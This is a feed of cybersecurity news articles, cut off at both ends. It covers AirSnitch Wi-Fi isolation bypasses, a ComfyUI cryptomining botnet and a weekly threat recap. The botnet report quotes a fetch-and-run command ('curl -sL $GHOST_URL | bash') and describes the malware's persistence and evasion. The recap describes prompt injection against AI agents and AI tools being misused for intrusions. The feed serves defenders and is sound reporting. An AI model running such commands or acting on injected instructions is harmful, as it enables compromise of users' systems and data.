inside. Router redirection This attack exploits an architectural gap between Layer 2 and Layer 3 security found in some manufacturers’ hardware. The attacker sends a packet to the access point, setting the victim’s IP address as the destination at the network layer (L3). However, at the wireless layer (L2), the destination is set to the access point’s own MAC address, so the isolation filter doesn’t trip. The routing subsystem (L3) then dutifully routes the packet back out to the victim, bypassing the L2 isolation entirely. Like the previous methods, this is another transmit-only attack where the attacker can’t see the reply. Port stealing to intercept packets The attacker connects to the network using a spoofed version of the victim’s MAC address, and floods the network with ARP responses claiming, “this MAC address is on my port and SSID”. The target network’s router updates its MAC tables, and starts sending the victim’s traffic to this new port instead. Consequently, traffic intended for the victim ends up with the attacker — even if the victim is connected to a completely different SSID. In a scenario where the attacker connects via an open, unencrypted network, this means traffic meant for a client on a WPA2/WPA3-secured network is actually broadcast over the open air, where not only the attacker but anyone nearby can sniff it. Port stealing to send packets In this version, the attacker connects directly to the victim’s Wi-Fi adapter, and bombards it with ARP requests spoofing the access point’s MAC address. As a result, the victim’s computer starts sending its outgoing traffic to the attacker instead of the network. By running both stealing attacks simultaneously, an attacker can, in several scenarios, execute a full MitM attack. Practical consequences of AirSnitch attacks By combining several of the techniques described above, a hacker can pull off some pretty serious moves: Complete bidirectional traffic interception for a MitM attack. This means they can snatch and modify data moving between the victim and the access point without the victim ever knowing. Hopping between SSIDs. An attacker sitting on a guest network can reach hosts on a locked-down corporate network if both are running off the same physical access point. Attacks on RADIUS. Since many companies use RADIUS authentication for their corporate Wi-Fi, an attacker can spoof the access point’s MAC address to intercept initial RADIUS authentication packets. From there, they can brute-force the shared secret. Once they have that, they can spin up a rogue RADIUS server and access point to hijack data from any device that connects to it. Exposing unencrypted data from “secure” subnets: Traffic that’s supposed to be sent to a client under the protection of WPA2/WPA3 can be retransmitted onto an open guest network, where it’s essentially broadcast for anyone to hear. To pull off these attacks effectively, a hacker needs a device capable of simultaneous data transmission and reception with both the victim’s adapter and the access point. In a real-world scenario, this usually means a laptop with two Wi-Fi adapters running specifically configured Linux drivers. It’s worth noting that the attack isn’t exactly silent: it requires a flood of ARP packets, it can cause brief Wi-Fi glitches when it starts, and network speeds might tank to around 10Mbps. Despite these red flags, it’s still very much a practical threat in many environments. Vulnerable devices As part of the study, several enterprise and home access points and routers were put to the test. The list included products from Cisco, Netgear, Ubiquiti, Tenda, D-Link, TP-Link, LANCOM, and ASUS, as well as routers running popular community firmware like DD-WRT and OpenWrt. Every single device tested was vulnerable to at least some of the attacks described here. Even more concerning, the D-Link DIR-3040 and LANCOM LX-6500 were susceptible to every single variation of AirSnitch. Interestingly, some routers were equipped with protective mechanisms that blocked the attacks, even though the underlying architectural flaws were still present. For example, the Tenda RX2 Pro automatically disconnects any client whose MAC address appears on two BSSIDs simultaneously, which effectively shuts down port stealing. The researchers emphasize that any network administrator or IT security team serious about defense should test their own specific configurations. That’s the only way to pinpoint exactly which threats are relevant to your organization’s setup. How to protect your corporate network from AirSnitch The threat is most immediate for organizations running guest and corporate Wi-Fi networks on the same access points without additional VLAN segmentation. There are also significant risks for companies using RADIUS with outdated settings or weak shared secrets for wireless authentication. The bottom line is that we need to stop viewing client isolation on an access point as a real security measure, and start seeing it as just a convenience feature. Real security needs to be handled differently: Segment the network using VLANs. Each SSID should have its own VLAN, with strict 802.1Q packet tagging maintained all the way from the access point to the firewall or router. Implement stricter packet inspection at the routing level — depending on the hardware capabilities. Features like Dynamic ARP Inspection, DHCP snooping, and limiting the number of MAC addresses per port help defend against IP/MAC spoofing. Enable individual GTK keys for each client, if your equipment supports it. Use more resilient RADIUS and 802.1X settings, including modern cipher suites and robust shared secrets. Log and analyze EAP/RADIUS authentication anomalies in your SIEM. This helps track many attack attempts beyond just AirSnitch. Other red flag events to watch for include the same MAC address appearing on different SSIDs, spikes in ARP requests, or clients rapidly jumping between BSSIDs or VLANs. Apply security at higher levels of the network topology. Many of these attacks lose their punch if the organization has universally implemented TLS and HSTS for all business application traffic, requires an active VPN for all Wi-Fi connections, or has fully embraced a Zero Trust architecture.
kaspersky.comApr 10, 2026extracted
Over 1,000 Exposed ComfyUI Instances Targeted in Cryptomining Botnet Campaign
An active campaign has been observed targeting internet-exposed instances running ComfyUI, a popular stable diffusion platform, to enlist them into a cryptocurrency mining and proxy botnet. "A purpose-built Python scanner continuously sweeps major cloud IP ranges for vulnerable targets, automatically installing malicious nodes via ComfyUI-Manager if no exploitable node is already present," Censys security researcher Mark Ellzey said in a report published Monday. The attack activity, at its core, systemically scans for exposed ComfyUI instances and exploits a misconfiguration that allows remote code execution on unauthenticated deployments through custom nodes. Upon successful exploitation, the compromised hosts are added to a cryptomining operation that mines Monero via XMRig and Conflux via lolMiner, as well as to a Hysteria V2 botnet. Both of them are centrally managed through a Flask-based command-and-control (C2) dashboard. Data from the attack surface management platforms shows that there are more than 1,000 publicly-accessible ComfyUI instances. While not a huge number, it's sufficient for a threat actor to run opportunistic campaigns to reap financial gains. Censys said it discovered the campaign last month after identifying an open directory on 77.110.96[.]200, an IP address associated with a bulletproofing hosting services provider, Aeza Group. The directory is said to have contained a previously undocumented set of tools to pull off the attacks. This includes two reconnaissance tools to enumerate exposed ComfyUI instances across cloud infrastructure, identify those that have ComfyUI-Manager installed, and shortlist those that are susceptible to the code execution exploit. One of the two scanner Python scripts also functions as an exploitation framework that weaponizes ComfyUI's custom nodes to achieve code execution. This technique, some aspects of which were documented by Snyk in December 2024, takes advantage of the fact that some custom nodes accept raw Python code as input and run it directly without requiring any authentication. As a result, an attacker can scan exposed ComfyUI instances for specific custom node families that support arbitrary code execution, effectively turning the service into a channel for delivering attacker-controlled Python payloads. Some of the custom node families that the attack particularly looks for are listed below - Vova75Rus/ComfyUI-Shell-Executor filliptm/ComfyUI_Fill-Nodes seanlynch/srl-nodes ruiqutech/ComfyUI-RuiquNodes "If none of the target nodes are present, the scanner checks whether ComfyUI-Manager is installed," Censys said. "If available, it installs a vulnerable node package itself, then retries exploitation." It's worth noting that "ComfyUI-Shell-Executor" is a malicious package created by the attacker to fetch a next-stage shell script ("ghost.sh") from the aforementioned IP address. Once code execution is obtained, the scanner removes evidence of the exploit by clearing the ComfyUI prompt history. A newer version of the scanner also incorporates persistence mechanisms that cause the shell script to be downloaded every six hours and the exploit workflow to be re-executed every time ComfyUI is started. The shell script, for its part, disables shell history, kills competing miners, launches the miner process, anduses the LD_PRELOAD hook to hide a watchdog process that ensures the miner process is revived in the event it gets terminated. In addition, the miner program is copied to multiple locations so that even if the primary install directory gets wiped, it can be launched from one of the fallback locations. A third mechanism the malware uses to ensure persistence is the use of the "chattr +i" command to lock the miner binaries and prevent them from being deleted, modified, or renamed, even by the root user. "There is also dedicated code targeting a specific competitor, 'Hisana' (which is referenced throughout the code), which appears to be another mining botnet," Censys explained. "Rather than just killing it, ghost.sh overwrites its configuration to redirect Hisana's mining output to its own wallet address, then occupies Hisana’s C2 port (10808) with a dummy Python listener so Hisana can't restart." The infected hosts are commandeered by means of a Flask-based C2 panel, which allows the operator to push instructions or deploy additional payloads, including a shell script that installs Hysteria V2 with the likely goal of selling compromised nodes as proxies. Further analysis of the attacker's shell command history has revealed an SSH login attempt as root to the IP address 120.241.40[.]237, which has been linked to an ongoing worm campaign targeting exposed Redis database servers. "Much of the tooling in this repository appears hastily assembled, and the overall tactics and techniques might initially suggest unsophisticated activity," Censys said. "Specifically, the operator identifies exposed ComfyUI instances running custom nodes, determines which of those nodes expose unsafe functionality, and then uses them as a pathway to remote code execution." "The infrastructure accessed by the operator further supports the idea that this activity is part of a broader campaign focused on discovering and exploiting exposed services, followed by the deployment of custom tooling for persistence, scanning, or monetization." The discovery coincides with the emergence of multiple botnet campaigns in recent weeks - Exploitation of command injection vulnerabilities in n8n (CVE-2025-68613) and Tenda AC1206 routers (CVE-2025-7544) to add them to a Mirai-based botnet known as Zerobot. Exploitation of vulnerabilities in Apache ActiveMQ (CVE-2023-46604), Metabase (CVE-2023-38646), and React Server Components (CVE-2025-55182 aka React2Shell) to deliver Kinsing, a persistent malware used for cryptocurrency mining and launching Distributed Denial of Service (DDoS) attacks. Exploitation of a suspected zero-day vulnerability in fnOS Network Attached Storage (NAS) to target internet-exposed systems and implant them with a DDoS malware called Netdragon. "NetDragon establishes an HTTP backdoor interface on compromised devices, enabling attackers to remotely access and control the infected systems," QiAnXin XLab said. "It tampers with the 'hosts' file to hijack the official Feiniu NAS system update domains, effectively preventing devices from obtaining system updates and security patches." Expansion of RondoDox's exploit list to 174 different vulnerabilities, while shifting the attack methodology from a "shotgun approach" to more targeted and recent flaws that are more likely to lead to infections. Exploitation of known security vulnerabilities to deploy a new variant of Condi, a Linux malware that turns compromised linux devices into bots capable of conducting DDoS attacks. The binary references a string "QTXBOT," either indicating the name of the forked version or the internal project name. Brute-force attacks against SSH servers to launch an XMRig miner and generate illicit cryptocurrency revenue as part of an active cryptojacking operation called Monaco. Weak SSH passwords have also been used as attack pathways to deploy malware that establishes persistence, kills competing miners, connects to an external server, and performs a ZMap scan to propagate the malware in a worm-like fashion to other vulnerable hosts. "Botnet activity has surged over the last year, with Spauhaus noting 26% and 24% increases in the two six-month periods Jan - Jun 2025 and Jul - Dec 2025, respectively," Pulsedive said. "This increase is associated with bots and nodes appearing in the United States. The increase also stems from the availability of source code for botnets such as Mirai. Mirai offshoots and variants are responsible for some of the largest DDoS attacks by volume." ComfyUI Campaign Undergoes Updates The threat actors behind the campaign targeting exposed ComfyUI instances have been observed actively refining the primary payload with an emphasis on sandbox detection, process hiding, aggressive competition killing, and lateral movement. The new version has been internally codenamed "GHOST v6.0 – Domination Edition" by the malware author. While "ComfyUI-Shell-Executor" was previously observed delivering a text file named "q11.txt," which then unpacked the "ghost.sh" shell script, The Hacker News found that the package was updated on April 2, 2026, to fetch a different text file called "q12.txt." The GitHub user associated with the repository has since reverted the change as of April 9, 2026. When reached for comment regarding the functionality of the new payload, Censys said the malware performs a number of new steps - Check whether it's running in a sandbox-like environment and arrive at a score based on memory usage (less than 512MB), disk size (less than 5GB) the number of network interfaces, and the presence of debuggers and words like "sandbox," "analysis," "malware," "honey" (short for honeypot), or "virus" in either the current username of the process or the output of dmesg. If the score is greater than 5, it exits. An updated process-hiding mechanism that fetches the process name it attempts to hide under at runtime, as opposed to hard-coding it so as to give the impression that it's something that's already running on the system. Terminate processes that take up more than 80% of the CPU and those that run out of /tmp, shared memory, or /var/tmp directories, and that have TCP connections going out to specific ports (8081, 3333, 5555, 6969, 9999). It also deletes crontab entries and systemd services that may indicate a rival's cryptocurrency mining setup. Update local firewall rules to block known cryptomining pool servers when the shell script is being run as root. Add SSH key stub to the "authorized_keys" file, likely for persistent remote access. Auto-update itself with a new version by fetching an install script from the server that runs every 30 seconds. Spread via exposed Docker instances that have the default API port 2375 open ("spread_docker_api") and scan the local network for unauthenticated Redis servers to propagate the script to other servers ("_spread_redis"). Spread_docker_api "scans the local network subnet looking for unauthenticated docker (containerization service) servers on port 2375, and if it finds one, creates a privileged container using the host's filesystem mounted at /mnt/host," Censys explained. "The container payload is just apk add curl bash && curl -sL $GHOST_URL | bash, which runs the whole thing in the discovered docker daemon." (The story was updated after publication on April 9, 2026, with additional insights from Censys.)
thehackernews.comApr 7, 2026extracted
⚡ Weekly Recap: SD-WAN 0-Day, Critical CVEs, Telegram Probe, Smart TV Proxy SDK and More
This week is not about one big event. It shows where things are moving. Network systems, cloud setups, AI tools, and common apps are all being pushed in different ways. Small gaps in access control, exposed keys, and normal features are being used as entry points. The pattern becomes clear only when you see everything together. Faster scans, smarter misuse of trusted services, and steady targeting of high-value sectors. Each story adds context. Reading them all gives a fuller picture of how today’s threat landscape is evolving. ⚡ Threat of the Week Cisco SD-WAN Zero-Day Exploited — A newly disclosed maximum-severity security flaw in Cisco Catalyst SD-WAN Controller (formerly vSmart) and Catalyst SD-WAN Manager (formerly vManage) has come under active exploitation in the wild as part of malicious activity that dates back to 2023. The vulnerability, tracked as CVE-2026-20127 (CVSS score: 10.0), allows an unauthenticated remote attacker to bypass authentication and obtain administrative privileges on an affected system by sending a crafted request. Cisco credited the Australian Signals Directorate's Australian Cyber Security Centre (ASD-ACSC) for reporting the vulnerability. The networking equipment major is tracking the exploitation and subsequent post-compromise activity under the moniker UAT-8616, describing the cluster as a "highly sophisticated cyber threat actor." Control Your AI Agents Before They Control You Airia is the governance and orchestration layer for enterprise AI. Monitor drift, enforce policy, optimize inference cost, and generate audit-ready evidence—so your AI scales securely, compliantly, and profitably. Request a Demo ➝ 🔔 Top News Anthropic Accuses 3 Chinese Firms of Distillation Attacks — Anthropic accused three Chinese AI firms of engaging in concerted "industrial-scale" distillation attack campaigns aimed at extracting information from its model, making it the latest American tech firm to level such claims after OpenAI issued similar complaints. DeepSeek, Moonshot AI, and MiniMax are said to have flooded Claude with large volumes of specially-crafted prompts to elicit responses to train their own proprietary models. Last month, OpenAI submitted an open letter to U.S. legislators, claiming to have observed activity "indicative of ongoing attempts by DeepSeek to distill frontier models of OpenAI and other U.S. frontier labs, including through new, obfuscated methods." The disclosure renewed a debate over training data sources and distillation techniques, with some criticizing the company for training its own systems using copyrighted material without permission. "Anthropic is guilty of stealing training data at a massive scale and has had to pay multibillion-dollar settlements for their theft," xAI CEO Elon Musk said. Google Disrupts UNC2814 GRIDTIDE Campaign — Google disclosed that it worked with industry partners to disrupt the infrastructure of a suspected China-nexus cyber espionage group tracked as UNC2814 that breached at least 53 organizations across 42 countries. The tech giant described UNC2814 as a prolific, elusive actor that has a history of targeting international governments and global telecommunications organizations across Africa, Asia, and the Americas. Central to the hacking group's operations is a novel backdoor dubbed GRIDTIDE that abuses Google Sheets API as a communication channel to disguise C2 traffic and facilitate the transfer of raw data and shell commands. Chinese cyber espionage groups have consistently prioritized the telecommunication sector as a target precisely because of the access their networks provide to sensitive data and lawful intercept infrastructure. Thousands of Public Google Cloud API Keys Exposed with Gemini Access — New research has found that Google Cloud API keys, typically designated as project identifiers for billing purposes, could be abused to authenticate to sensitive Gemini endpoints and access private data. The problem occurs when users enable the Gemini API on a Google Cloud project (i.e., Generative Language API), causing the existing API keys in that project, including those accessible via the website JavaScript code, to gain surreptitious access to Gemini endpoints without any warning or notice. With a valid key, an attacker can access uploaded files, cached data, and even rack up LLM usage charges, Truffle Security said. The issue has since been plugged by Google. UAT-10027 Targets U.S. Education and Healthcare Sectors — A previously undocumented threat activity cluster known as UAT-10027 has been attributed to an ongoing malicious campaign targeting education and healthcare sectors in the U.S. since at least December 2025. The end goal of the attacks is to deliver a never-before-seen backdoor codenamed Dohdoor. "Dohdoor utilizes the DNS-over-HTTPS (DoH) technique for command-and-control (C2) communications and has the ability to download and execute other payload binaries reflectively," Cisco Talos said. Analysis of the campaign has revealed no evidence of data exfiltration to date. Although no final payloads have been observed other than what appears to be the Cobalt Strike Beacon to backdoor into the victim's environment, it's believed that UAT-10027's actions are likely driven by financial gain based on the victimology pattern. Claude Code Flaws Allow Remote Code Execution and API Key Exfiltration — Security vulnerabilities in Anthropic Claude Code could have allowed attackers to remotely execute code on users' machines and steal API keys by injecting malicious configurations into repositories, and then waiting for an unsuspecting developer to clone and open an untrustworthy project. The vulnerabilities were addressed between September 2025 and January 2026. "The ability to execute arbitrary commands through repository-controlled configuration files created severe supply chain risks, where a single malicious commit could compromise any developer working with the affected repository," Check Point said. "The integration of AI into development workflows brings tremendous productivity benefits, but also introduces new attack surfaces that weren't present in traditional tools." ️🔥 Trending CVEs New vulnerabilities surface daily, and attackers move fast. Reviewing and patching early keeps your systems resilient. Here are this week’s most critical flaws to check first — CVE-2025-40538, CVE-2025-40539, CVE-2025-40540, CVE-2025-40541 (SolarWinds Serv-U), CVE-2026-20127, CVE-2026-20122, CVE-2026-20126, CVE-2026-20128 (Cisco Catalyst SD-WAN), CVE-2026-25755 (jsPDF), CVE-2025-12543 (HPE Telco Service Activator), CVE-2026-22719, CVE-2026-22720, CVE-2026-22721 (Broadcom VMware Aria Operations), CVE-2026-3061, CVE-2026-3062, CVE-2026-3063 (Google Chrome), CVE-2025-10010 (CryptoPro Secure Disk for BitLocker), CVE-2025-13942, CVE-2025-13943, CVE-2026-1459 (Zyxel), CVE-2025-71210, CVE-2025-71211 (Trend Micro Apex One), CVE-2026-0542 (ServiceNow AI Platform), CVE-2026-24061 (telnetd), CVE-2026-21902 (Juniper Networks Junos OS), CVE-2025-29631, CVE-2025-1242 (Gardyn Home Kit), CVE-2025-15576 (FreeBSD), CVE-2026-26365 (Akamai), CVE-2026-27739 (Angular), and SVE-2025-50109 (Samsung Tizen OS). 🎥 Cybersecurity Webinars Automating Real-World Security Testing to Prove What Actually Works → This webinar explains why one-time security assessments are no longer enough and shows how organizations can automate continuous, real-world testing of their defenses to uncover gaps and measure how well controls hold up against actual attack techniques. When AI Agents Become Your New Attack Surface → This webinar explains that as AI tools turn into autonomous agents that can browse, call APIs, and access internal systems, the security risk expands beyond the model to the entire environment they operate in, requiring stricter access controls, monitoring, and system-level safeguards rather than model testing alone. Quantum Is Coming: Preparing for the End of Today’s Encryption → This webinar explains how future quantum computers could break today’s encryption, why “harvest now, decrypt later” attacks are a real risk, and what practical steps organizations can take now to begin shifting to post-quantum cryptography. 📰 Around the Cyber World UNC6384 Drops New PlugX Variant — IIJ-SECT and LAB52 have detailed new activity from the Chinese cyber espionage group UNC6384. The attacks follow a known modus operandi of using STATICPLUGIN, a digitally signed downloader, to deliver updated versions of PlugX using DLL side-loading. The malicious payloads are distributed via phishing emails with meeting invitation lures or through fake software updates. OpenAI Takes Action Against ChatGPT Accounts Used for Harmful Purposes — OpenAI said it took down ChatGPT accounts used for influence operations, phishing, and malware development. This included a possible Chinese intelligence operation in which an individual associated with Chinese law enforcement used the AI tool for covert influence operations against domestic and foreign adversaries. The company also acted against clusters conducting reconnaissance about U.S. persons and federal building locations, online romance scams, and Russian influence operations across Africa by generating social media posts and long-form commentary articles. "Unusually, this scam network combined manual ChatGPT prompting and an automated AI chatbot to try to entrap its targets," OpenAI said about the scam operation running out of Cambodia. Some of these scams targeted Indonesian loveseekers. Other scams used ChatGPT to create content that purported to come from fictitious law firms, as well as impersonate real attorneys and U.S. law enforcement as part of a recovery scam targeting fraud victims. AI-Induced Lateral Movement — New research from Orca Security has highlighted how AI can become a "third dimension" in the world of lateral movement, after network and identity, allowing attackers to expand their reach. "By injecting prompt injections in overlooked fields that are fetched by AI agents, hackers can trick LLMs, abuse Agentic tools, and carry out significant security incidents," Orca said. "LLMs don’t truly understand the difference between data and instructions, and when tool output is fed back into the model, it can be interpreted as something to act on. Which opens a window to AI-induced Lateral Movement (AILM) activities." Russia Launches Probe into Telegram CEO — Russian authorities launched a criminal investigation of Telegram founder and CEO Pavel Durov. He is allegedly charged with promoting and facilitating terrorist activity on the messaging platform by failing to respond to law enforcement takedown requests. Russian officials have accused Durov of choosing a "path of violence and permissiveness" by not cooperating with its law enforcement agencies, according to the Rossiyskaya Gazeta. The move comes after Russia began restricting access to Telegram in the country in favor of MAX. Last month, Durov called it an "attempt to force its citizens to switch to a state-controlled app built for surveillance and political censorship." Hacked Prayer App Sends Surrender Messages — According to reports from The Wall Street Journal and WIRED, unidentified hackers seized control of an Iranian prayer app during a joint U.S.-Israeli attack to send messages urging the Iranian military to lay down their weapons and promising amnesty if they surrendered. The messages were sent in the form of push notifications to the BadeSaba Calendar app. It's currently not clear who is behind the hack. The app has been downloaded more than 5 million times from the Google Play Store. Following the U.S.-Israel war on Iran, the government shut down all internet access in the country. Smart TVs Turned Into AI Content Scrapers — Several smart TV app makers are deploying a new SDK named Bright SDK that lets users see fewer ads but also stealthily turns their TV into a node in a global proxy network that crawls and scrapes the web. Bright Data, the company behind the SDK, claims to operate more than 150 million residential proxy IP addresses spanning 195 countries. Multiple Stealer Malware Families Detected — Multiple information stealer families have been detected in the wild. This includes Arkanix, CharlieKirk GRABBER, ComSuon, DarkCloud, MawaStealer, and MioLab (NovaStealer). Kaspersky's analysis of Arkanix has revealed that it was likely developed as an LLM-assisted experiment, shrinking development time and costs. While Arkanix was promoted on underground forums in October 2025, the malware-as-a-service (MaaS) appears to have been taken down towards the end of 2025. The findings demonstrate continued demand for off-the-key stealer malware, creating an ecosystem that enables other threat actors to purchase stealer logs for obtaining initial access to targets. "Raw Infostealer logs are meticulously filtered by corporate domain, packaged, and sold to initial access brokers and attackers specifically looking for frictionless entry points into high-value corporate networks," Hudson Rock said. The development has been complemented by underground networks turning into cybercrime marketplaces, complete with reputation systems, escrow, and specialist vendors, Varonis added. "One operator runs infostealers across thousands of machines. Another extracts and sorts the credentials. A third sells curated access," security researcher Daniel Kelley said. "A fourth deploys the ransomware. Each person focuses on what they do best, and the ecosystem has become ruthlessly efficient." Chilean National Extradited to U.S. to Face Financial Fraud Crimes — Alex Rodrigo Valenzuela Monje (aka VAL4K), a 24-year-old Chilean national, has been extradited to the U.S. over his alleged role in running a cybercrime operation that involved the trafficking of payment card data. The defendant is accused of trafficking stolen credit card numbers and information for over 26,500 credit cards. "From at least May 2021 to August 2023, Valenzuela Monje operated an illegal online card shop, selling dumps of unauthorized access devices through Telegram channels," the U.S. Justice Department said. "He allegedly operated the channels known as MacacoCC Collective and Novato Carding, offering payment card data for virtually all U.S. payment cards." New FUNNULL Infrastructure Discovered — QiAnXin has flagged new infrastructure associated with FUNNULL, a Philippines-based content delivery network (CDN) sanctioned last year by the U.S. Treasury for facilitating cyber scam operations. "Previously, their main method was to poison existing public CDN services; now they have evolved to independently develop complete server-side attack suites (RingH23), actively infiltrating CDN nodes, demonstrating a significant improvement in control and technical sophistication," QiAnXin XLab said. Two independent supply chain infection channels have been identified: the compromise of maccms.la to distribute a malicious PHP backdoor through its update channel, and the compromise of the GoEdge CDN management node to implant an infection module, and deploy the proprietary RingH23 attack suite to all edge nodes via SSH remote commands. The campaign has compromised 10,748 unique IP addresses, predominantly video streaming sites. Spike in Scans for SonicWall Devices — GreyNoise said it detected a spike in scans for SonicWall devices originating from the infrastructure of a known proxy provider. The activity started on February 22, 2026, and scanned for exposed SonicWall SSL VPNs. A total of 84,142 scanning sessions targeting SonicWall SonicOS infrastructure were observed between February 22 and February 25, 2026. The scanning came from 4,305 unique IP addresses across 20 autonomous systems. "Ninety-two percent of sessions probed a single API endpoint to determine whether SSL VPN is enabled — the prerequisite check before credential attacks," GreyNoise said. "A commercial proxy service delivered 32% of campaign volume through 4,102 rotating exit IPs in two surgical bursts totaling 16 hours." Google Removes 115 Android Apps Tied to Ad Fraud — A new ad fraud operation dubbed Genisys involved hijacking Android devices to run malicious activity in the background. The activity leveraged a set of 115 apps that stealthily opened websites inside hidden browser windows to generate ad display revenue for their creators. More than 500 domains were generated using AI tools to serve the ads. "They appear as generic blogs, news-style sites, and informational properties produced at scale, built not to attract real audiences but to receive and monetize fraudulent traffic," Integral Ads said. The apps have since been removed by Google. The findings build on another mobile ad fraud scheme called Arcade in which mobile apps generated hidden in-app browser activity to load websites in the background and convert mobile-origin activity into web traffic. Zerobot Exploits Flaws in n8n and Tenda Routers — A Mirai-based IoT botnet named Zerobot has been observed exploiting vulnerabilities in the n8n AI automation platform (CVE-2025-68613) and Tenda routers (CVE-2025-7544) to expand its reach. The activity was first detected in January 2026. "Targeting of the n8n vulnerability is particularly interesting: Botnets typically exploit Internet of Things (IoT) devices, such as security cameras, DVRs, and routers, but n8n falls into an entirely different category," Akamai said. "Although this isn’t entirely new behavior for botnets, this sort of targeting presents a greater danger to organizations by exposing more critical infrastructure to compromise as the n8n exploit could enable lateral movement for a threat actor." Various ClickFix Campaigns Spotted — Threat hunters disclosed multiple ClickFix campaigns, including one leading to a hands-on-keyboard attack that deployed the Termite ransomware. The attack has been attributed to a group known as Velvet Tempest (DEV-0504). Another ClickFix campaign, codenamed OCRFix, used websites impersonating the Tesseract OCR tool as a launchpad for delivering malware that uses EtherHiding to retrieve the C2 server, send system information, and await further instructions. A third campaign has been found employing fake GitHub repositories impersonating software companies and leveraging ClickFix to social-engineer victims into installing infostealers, such as SHub Stealer v2.0. GTFire Phishing Scheme Detailed — A phishing campaign dubbed GTFire is abusing Google Firebase to host phishing pages and Google Translate to disguise the malicious URLs and bypass email and web security filters. "By chaining these services together, the attackers create phishing links that appear benign, leverage Google’s reputation, and dynamically redirect victims to brand‑impersonating login pages," Group-IB said. "Once credentials are submitted and harvested, victims are often redirected back to the legitimate website of the targeted organization, reducing suspicion and delaying incident response." The campaign is estimated to have harvested thousands of stolen credentials associated with more than a thousand organizations, spanning over a hundred countries and hundreds of industries. The threat actor behind the operation has been active since at least January 1, 2022. Mexico, the U.S., Spain, India, and Argentina are among the prominent targets. C77L Ransomware Targets Russia — A ransomware operation called C77L has been tied to at least 40 attacks on Russian and Belarusian enterprises since March 2025. The group is assessed to be operating out of Iran. Initial access to target networks is accomplished via weak passwords for publicly available RDP and VPN endpoints. "The targets of attacks are Windows systems due to their overwhelming predominance in the IT infrastructures of medium and small businesses," F6 said. RESURGE Malware Can Be Dormant on Infected Ivanti Devices — The U.S. Cybersecurity and Infrastructure Security Agency (CISA) updated its original alert for RESURGE, a piece of malware deployed as part of exploitation activity targeting a now-patched security flaw in Ivanti Connect Secure (ICS) appliances. The agency said "RESURGE has sophisticated network-level evasion and authentication techniques, leveraging advanced cryptographic methods and forged TLS certificates to facilitate covert communications," adding "RESURGE can remain latent on systems until a remote actor attempts to connect to the compromised device." 30 Members of The Com Arrested — A coordinated law enforcement operation led by Europol detained 30 individuals connected to an underground online community known as The Com. The operation, launched in January 2025, has been codenamed Project Compass. An additional 179 members were also identified as part of the investigation. The Com is the name assigned to a loose-knit cybercrime collective that has been linked to online doxxing, harassment, threats of violence, extortion, sexual exploitation, phishing, SIM swapping, ransomware, and other digital crimes. Europol described The Com as a decentralized extremist network. U.K. Government Cuts Cyber Attack Fix Times by 84% — The U.K. government has claimed it has reduced its backlog of critical vulnerabilities by 75% and reduced cyber attack fix times by 87%. Serious security weaknesses in public sector websites are fixed six times faster, cutting the average time from nearly two months to just over a week, the U.K. government said in an update published on 26 February. Poland Dismantles Organized Crime Group — Poland's Central Bureau for Combating Cybercrime (CBZC) dismantled an organized group that used phishing to take control of Facebook accounts and extract BLIK payment codes from victims. Eleven members of an organized criminal group operating in Poland and Germany between May 2022 and May 2024 were identified. Six suspects have been placed in pretrial detention as part of the investigation, and over 100,000 credentials were seized. The group used "phishing techniques to obtain login details for Facebook accounts, and then gained access to them and used instant messaging to extort BLIK codes from other users of the portal," CBZC said. Hacker Exploits Clade to Target Mexican Government Sites — An unknown hacker exploited Anthropic's Claude chatbot to carry out attacks against Mexican government agencies, according to a report by Gambit Security. "Within a month of the initial compromise, ten government bodies and one financial institution were affected, approximately 195 million identities exposed, and roughly 150GB of data exfiltrated: tax records, civil registry files, voter data," the company said. "The attacker even built an automated system that forges official government tax certificates using live data. It was orchestrated by an individual actor directing AI to operate as a nation-state-level team of operators and analysts." The operation ran on more than 1,000 prompts and regularly passed information to OpenAI's GPT-4.1 for analysis. The breach began in late December 2025 and continued for about a month. Anthropic has since disrupted the activity and banned all of the accounts involved. The attacks haven't been attributed to a specific group. 🔧 Cybersecurity Tools Titus → It is an open-source tool from Praetorian that scans code, files, repositories, and traffic to find leaked credentials like API keys and tokens. It uses hundreds of pattern rules and can check whether a detected secret is actually active. You can run it as a command-line tool, use it inside other tools as a Go library, or use it as extensions in Burp Suite or a browser to uncover credential leaks in different workflows. Sirius → It is an open-source vulnerability scanning platform on GitHub that automates network and system security checks to find weaknesses and risks in infrastructure. It combines community-driven security data with automated tests, runs within containers, and gives operators a unified view of vulnerabilities to prioritize remediation. Disclaimer: These tools are provided for research and educational use only. They are not security-audited and may cause harm if misused. Review the code, test in controlled environments, and comply with all applicable laws and policies. Conclusion Viewed one by one, these incidents seem contained. Seen together, they show how risk now flows across connected systems that organizations rely on daily. Infrastructure, AI platforms, cloud services, and third-party tools are deeply intertwined, and strain in one area often exposes another. The takeaway is clarity, not alarm. Adversaries are improving efficiency, scaling access, and operating inside normal processes. Reading through each report helps map that shift and understand how the broader environment is changing.
thehackernews.comMar 2, 2026extracted
Unione europea e India, una partnership per la cyber resilienza
La cooperazione cyber UE–India si muove su un terreno comune ma poggia su ecosistemi normativi e motivazioni strategiche diverse. Dopo quasi due decenni di negoziati intermittenti, il 27 gennaio 2026 a Nuova Delhi, durante il 16° Vertice UE–India, Unione europea e India hanno annunciato la conclusione di un accordo di libero scambio (FTA), presentato politicamente come un’intesa “storica” e, nelle parole di Ursula von der Leyen, come “la madre di tutti gli accordi”. L’FTA nasce in un contesto di riassetto delle catene di fornitura, pressioni protezionistiche e competizione tecnologica, e punta a stabilizzare l’interdipendenza economica UE–India come asset strategico, oltre che commerciale. Assieme, India e Unione europea rappresentano infatti un quarto della popolazione mondiale (quasi 2 miliardi di consumatori) e costituiscono circa il 25% del PIL mondiale. In parallelo, lo stesso vertice ha visto la firma di una nuova Partnership di Difesa e Sicurezza tra UE e India. Un accordo che formalizza un salto di qualità: dalla cooperazione settoriale a un quadro “tailor-made” con dialoghi annuali e meccanismi di indirizzo politico. Il messaggio è chiaro: il commercio è la piattaforma, la sicurezza (anche digitale) è la garanzia di continuità. E arriva mentre Bruxelles, pochi giorni prima, ha presentato un nuovo “cybersecurity package” per rafforzare resilienza e coordinamento, segnalando quanto la dimensione cyber rappresenti una priorità in chiave securitaria anche per l’UE. Un terreno comune ma ecosistemi normativi diversi La cooperazione cyber UE–India si muove su un terreno comune (resilienza, contrasto al cybercrime, capacity building), ma poggia su ecosistemi normativi e motivazioni strategiche diverse. Di fronte a un contesto di sicurezza sempre più incerto, l’analisi dell’Observer Research Foundation evidenzia infatti come l’UE tenda a leggere la cybersicurezza come estensione di un paradigma centrato su standard, multilateralismo, tutela dei diritti e armonizzazione regolatoria; mentre l’India ha storicamente privilegiato una postura 